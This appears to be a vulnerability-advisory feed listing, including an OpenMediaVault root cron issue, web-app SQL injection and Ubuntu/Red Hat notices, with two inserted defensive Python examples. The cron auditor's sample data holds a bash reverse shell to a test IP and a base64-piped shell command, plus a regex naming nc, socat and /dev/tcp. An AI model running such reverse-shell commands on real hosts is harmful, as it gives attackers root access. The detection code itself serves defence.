OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.
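Because the abuse path above ends in a root-owned cron entry, the check a defender wants on an OpenMediaVault host is an audit of the system-format cron files for jobs that run as root with command-execution indicators. The following is an added example, not code from the advisory or from the OpenMediaVault project; the sample file content is constructed, the path /etc/cron.d/openmediavault-userdefined is assumed to be where OMV writes user-defined jobs (verify on the target), and the indicator list is a heuristic of this example's own choosing.

```python
"""Audit system-style cron files (/etc/cron.d/*) for jobs scheduled as root.

Added example; not part of the OpenMediaVault advisory or project code.
The sample below is constructed. The OMV file path and the indicator
list are assumptions, not facts taken from the advisory.
"""
import re
from dataclasses import dataclass
from typing import List

# Heuristic indicators of command-execution payloads (assumed list).
SUSPICIOUS = re.compile(
    r"/dev/tcp/|\bnc\b|\bncat\b|\bsocat\b|base64 -d"
    r"|curl[^|]*\|\s*(ba)?sh|wget[^|]*\|\s*(ba)?sh"
)

# @reboot/@daily style line: special-string, user, command.
_SPECIAL = re.compile(r"^(@[a-z]+)\s+(\S+)\s+(.+)$")
# Five time fields, then user, then command (cron.d / /etc/crontab format).
_FIELDS = re.compile(r"^((?:\S+\s+){5})(\S+)\s+(.+)$")
_ENV = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


@dataclass
class CronJob:
    schedule: str
    user: str
    command: str
    lineno: int

    @property
    def suspicious(self) -> bool:
        return bool(SUSPICIOUS.search(self.command))


def parse_cron_d(text: str) -> List[CronJob]:
    """Parse the user-field cron format into CronJob records."""
    jobs: List[CronJob] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or _ENV.match(line):
            continue  # blank, comment, or environment assignment
        m = _SPECIAL.match(line)
        if m:
            jobs.append(CronJob(m.group(1), m.group(2), m.group(3), lineno))
            continue
        m = _FIELDS.match(line)
        if m:
            jobs.append(CronJob(m.group(1).strip(), m.group(2), m.group(3), lineno))
    return jobs


def root_jobs(text: str) -> List[CronJob]:
    return [j for j in parse_cron_d(text) if j.user == "root"]


def flagged_root_jobs(text: str) -> List[CronJob]:
    """Root-run jobs whose command matches a suspicious indicator."""
    return [j for j in root_jobs(text) if j.suspicious]


# Constructed sample standing in for /etc/cron.d/openmediavault-userdefined
# (path assumed). Two benign entries, two that a reviewer should look at.
SAMPLE = """\
# m h dom mon dow user command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
0 3 * * * root /usr/sbin/omv-backup >/dev/null 2>&1
*/5 * * * * backup rsync -a /srv/data/ /mnt/backup/
* * * * * root bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'
@reboot root /bin/sh -c "echo c2ggLWkK | base64 -d | sh"
"""

if __name__ == "__main__":
    for job in flagged_root_jobs(SAMPLE):
        print(f"line {job.lineno}: [{job.schedule}] {job.user}: {job.command}")
```

On a live host, read each file under /etc/cron.d/ into parse_cron_d and review every root-run entry, not only the flagged ones: the advisory's point is that any authenticated web user could have placed the job, so the user field alone is the signal that matters.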
977b68b131bff0d949e6b913d2598f3af7e54c6447c2599729d421f769bac029
Readymade Real Estate Script suffers from remote blind SQL injection and cross site scripting vulnerabilities. This was last validated on the build available as of July 12, 2024.
69386793e89cd8dd66c1d690fdd8aaaa1e52413aa12dedc645d9ef84ac9279a6
Ubuntu Security Notice 6934-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.39 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 24.04 LTS. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.
8e19ddfa7b465f3b22bb3e9d4a490937544b8838c05cfd5ad6de902d90a2f085
Ubuntu Security Notice 6932-1 - It was discovered that the Hotspot component of OpenJDK 21 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 21 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
92b1bafe6e5d4ee4b322aaab6a609d8615a3bfbb3a543f0940ed55bcc0c2a5b5
Ubuntu Security Notice 6931-1 - It was discovered that the Hotspot component of OpenJDK 17 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 17 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
b3e5f81d7594d4e27286cdf314c3ba39afa280b68b40db8274bd9a6fb236d9a4
Ubuntu Security Notice 6930-1 - It was discovered that the Hotspot component of OpenJDK 11 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 11 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
64ed7468d6981b59402fc69e4b058670397d166eba644ba4e17b84199bc55681
AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.
5058deb5a1cc69ff116aa38a8a8e12d52904972c6285fe8c8a0fcc30aabf4c26
Ubuntu Security Notice 6929-1 - It was discovered that the Hotspot component of OpenJDK 8 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that the Hotspot component of OpenJDK 8 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.
f4e9c4f3c7e69bd458944b9f132afa2f82f2fb0cc5990844424b460d546df0bd
Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.
d177460484605e92448747eb5276d4dbc65842e8466efab16cfdeff8b9e1e531
Ubuntu Security Notice 6928-1 - It was discovered that the Python ssl module contained a memory race condition when handling the APIs to obtain the CA certificates and certificate store statistics. This could possibly result in applications obtaining wrong results, leading to various SSL issues. It was discovered that the Python ipaddress module contained incorrect information about which IP address ranges were considered "private" or "globally reachable". This could possibly result in applications applying incorrect security policies.
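The ipaddress issue matters for code that gates SSRF, egress or allow-list decisions on is_private or is_global: on an unpatched interpreter those flags disagree with the IANA special-purpose registries for several blocks. The added example below (this editor's code, not the advisory's or CPython's) shows the practitioner's mitigation: carry an explicit table of non-reachable blocks and their registry exceptions instead of trusting the interpreter's flags, and use the stdlib only to report where the two disagree. The block list is transcribed from the IANA IPv4/IPv6 Special-Purpose Address Registries; treating the whole 2001::/23 IETF block as non-reachable apart from the listed exceptions is a conservative policy choice of this example, and the function names are its own.

```python
"""Explicit global-reachability policy independent of ipaddress.is_global.

Added example, not code from the Ubuntu advisory or from CPython. Block
list transcribed from the IANA special-purpose registries; denying all of
2001::/23 except the listed exceptions is this example's conservative choice.
"""
import ipaddress
from typing import Iterable, List

# Special-purpose blocks the registries mark as NOT globally reachable.
NOT_GLOBAL = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8",           # "this network"
    "10.0.0.0/8",          # RFC 1918
    "100.64.0.0/10",       # shared address space (CGNAT), RFC 6598
    "127.0.0.0/8",         # loopback
    "169.254.0.0/16",      # link local
    "172.16.0.0/12",       # RFC 1918
    "192.0.0.0/24",        # IETF protocol assignments (see exceptions)
    "192.0.2.0/24",        # TEST-NET-1
    "192.88.99.0/24",      # deprecated 6to4 relay anycast
    "192.168.0.0/16",      # RFC 1918
    "198.18.0.0/15",       # benchmarking
    "198.51.100.0/24",     # TEST-NET-2
    "203.0.113.0/24",      # TEST-NET-3
    "224.0.0.0/4",         # multicast
    "240.0.0.0/4",         # reserved
    "255.255.255.255/32",  # limited broadcast
    "::/128",              # unspecified
    "::1/128",             # loopback
    "::ffff:0:0/96",       # IPv4-mapped
    "64:ff9b:1::/48",      # IPv4/IPv6 local translation
    "100::/64",            # discard-only
    "2001::/23",           # IETF protocol assignments (policy: deny, see exceptions)
    "2001:db8::/32",       # documentation
    "2002::/16",           # 6to4
    "fc00::/7",            # unique local
    "fe80::/10",           # link local
    "ff00::/8",            # multicast
)]

# Sub-ranges inside the blocks above that the registries mark globally reachable.
GLOBAL_EXCEPTIONS = [ipaddress.ip_network(n) for n in (
    "192.0.0.9/32",        # Port Control Protocol anycast, RFC 7723
    "192.0.0.10/32",       # TURN anycast, RFC 8155
    "2001:1::1/128",       # PCP anycast
    "2001:1::2/128",       # TURN anycast
    "2001:3::/32",         # AMT
    "2001:4:112::/48",     # AS112-v6
)]


def is_globally_reachable(addr: str) -> bool:
    """Policy decision from the explicit table; exceptions win over blocks."""
    ip = ipaddress.ip_address(addr)
    if any(ip in net for net in GLOBAL_EXCEPTIONS):
        return True
    return not any(ip in net for net in NOT_GLOBAL)


def policy_disagreements(addrs: Iterable[str]) -> List[str]:
    """Addresses where the running interpreter's is_global differs from
    this table. On a patched interpreter the list should be empty."""
    return [a for a in addrs
            if ipaddress.ip_address(a).is_global != is_globally_reachable(a)]


# Constructed probe set covering the blocks the advisory is about.
PROBES = ["8.8.8.8", "10.1.2.3", "100.64.0.1", "192.0.0.1", "192.0.0.9",
          "198.18.0.7", "64:ff9b:1::1", "2001:db8::1", "2001:1::1", "2002::1"]

if __name__ == "__main__":
    for a in PROBES:
        print(f"{a:>14} reachable={is_globally_reachable(a)} "
              f"stdlib is_global={ipaddress.ip_address(a).is_global}")
    print("disagreements:", policy_disagreements(PROBES))
```

Run policy_disagreements on the probe set across the interpreters you ship with; a non-empty result on an older build is exactly the "incorrect security policy" the notice describes, and the explicit table keeps your own decision stable across Python versions.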
6348aa6c803c2cb2243ee6f79a4a4964ae3836831f2a5635d54e6852bb5e11d9
SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.
22013989000d479ea07e76db9eff79fd7621f97874918eb37a3342e24fbd35df
AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.
760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b
Red Hat Security Advisory 2024-4938-03 - An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a null pointer vulnerability.
d452de2aa6e75076d2f3e8721c8b90b0bf1571959bdebabac8478415e805eb13
Red Hat Security Advisory 2024-4937-03 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a denial of service vulnerability.
4c2604fdae44be754d8a0513c7e63395b67fbfe9f90be45ce51de9fb3da3e457
Red Hat Security Advisory 2024-4936-03 - An update for the freeradius:3.0 module is now available for Red Hat Enterprise Linux 8.
e6d2c41175a0acd5861cc6a0c8176462281813df777cca58381e3fac1b9650a3
Red Hat Security Advisory 2024-4935-03 - An update for freeradius is now available for Red Hat Enterprise Linux 9.
2532e6dcb2d4da08b107649950751c606f734cf85dd66630e015ec8b37417713
Red Hat Security Advisory 2024-4934-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.
12fb5d6e5d2cdec776f8c371f3506e5c0f6387296d6267bb3de1a9c532930402
Red Hat Security Advisory 2024-4933-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a denial of service vulnerability.
55a61d1ba52b8b71b73acd02d2c990f7576342720ed726606929af825dd44ed1
AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
a27d6ecbb685d624f010c47638973a78a91c45496e0c3d8256ad20eeb76f2222
Red Hat Security Advisory 2024-4928-03 - An update for kernel is now available for Red Hat Enterprise Linux 9. Issues addressed include a null pointer vulnerability.
d85c1911157700d246f802349435694ee3fd873de2f76eb6b9c87f5544c9f2fe
Red Hat Security Advisory 2024-4922-03 - Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.
96baa5beae39a868e494284fbcfeb38307eb17a3a70b7bcfa63f53577cdc2dc6
Red Hat Security Advisory 2024-4913-03 - An update for the freeradius:3.0 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.
8b38e606db35992e5ab109b5e7053084677124debd879c04f500e3f14ad132c8
Red Hat Security Advisory 2024-4912-03 - An update for freeradius is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.
ddcfed84eceadbd19ceaf0a618b0d733d7ecb7c7ed690c29be91bc5ade7697f7
AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.
26ba3578925635eec579c27afdcf5dfe641d09db3c89b0df1e695a98b9056176
Red Hat Security Advisory 2024-4911-03 - An update for freeradius is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.
5686026f5780c87171eee9bd7ea8374d174b7ae8b314289fb9dac9e8ad1d9885